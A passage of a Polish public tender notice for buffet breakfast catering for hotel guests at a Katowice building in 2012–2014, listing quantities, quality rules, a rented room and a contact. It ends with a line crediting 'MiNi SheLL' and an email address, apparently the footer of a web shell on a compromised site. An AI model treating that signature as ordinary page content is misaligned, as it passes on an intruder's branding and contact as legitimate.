<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część B -świadczenie usług gastronomicznych w zakresie serwowania śniadań w formie szwedzkiego stołu dla gości hotelowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług gastronomicznych w zakresie serwowania śniadań w formie szwedzkiego stołu dla gości hotelowych w lokalu, który odpłatnie udostępnia Zamawiający, w terminie od 01.02.2012r. do 31.01.2014r. tj. 24 miesiące, z tym że Zamawiający udostępni Wykonawcy odpłatnie lokal od 01.01.2012r. celem technicznego i estetycznego przygotowania go do realizacji usługi. <BR> 
a) Maksymalna, przewidywana ilość śniadań w okresie realizacji usługi wynosi 23.000 szt. Zamawiający zastrzega sobie prawo do niewykorzystania tej ilości śniadań. <BR>
b) Przedmiot zamówienia winien być realizowany z należytą starannością, co oznacza zapewnienie wysokiej jakości posiłków /świeże, urozmaicone, estetycznie podane / zgodnie z obowiązującymi przepisami w kwestii żywienia zbiorowego. Zamawiający nie dopuszcza serwowania posiłków typu fast-food oraz przygotowanych np. na bazie gotowych dań czy półproduktów do odgrzania. <BR> 
c) Zamawiający dysponuje 100 miejscami hotelowymi w związku z tym Wykonawca winien być w gotowości do realizacji 100 śniadań dziennie. Zasadą serwowania śniadań jest forma szwedzkiego stołu. Wydawanie śniadań winno odbywać się w formie samoobsługi. <BR>
d) W celu realizacji przedmiotu zamówienia Zamawiający jako właściciel budynku Dom Asystenta nr 3 w Katowicach udostępni Wykonawcy w w/w budynku puste pomieszczenie nr 24 stanowiące zaplecze oraz salę konsumpcyjną o łącznej powierzchni 46 m2, wyposażone w instalacje: co, wod.-kan., elektryczną oraz wewnętrzną linię telefoniczną. Pomieszczenie zostanie udostępnione odpłatnie. 
e) Zamawiający umożliwia dokonanie wizji lokalnej po wcześniejszym, telefonicznym umówieniu się. Osobą do kontaktów w sprawie wizji lokalnej jest p. Małgorzata Szymańska Tel. 32 255-44-33. <BR>
Szczegółowy opis przedmiotu zamówienia zawarto w załączniku nr 2 do Specyfikacji. <BR>  
Wymagany termin realizacji: od 01.01.2012r. do 31.01.2014r. z zastrzeżeniem, że Wykonawca rozpocznie serwowanie śniadań od 01.02.2012r. <BR?
Miejsce świadczenia usługi - Dom Asystenta nr 3, zlokalizowany w Katowicach, ul. Paderewskiego 32..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com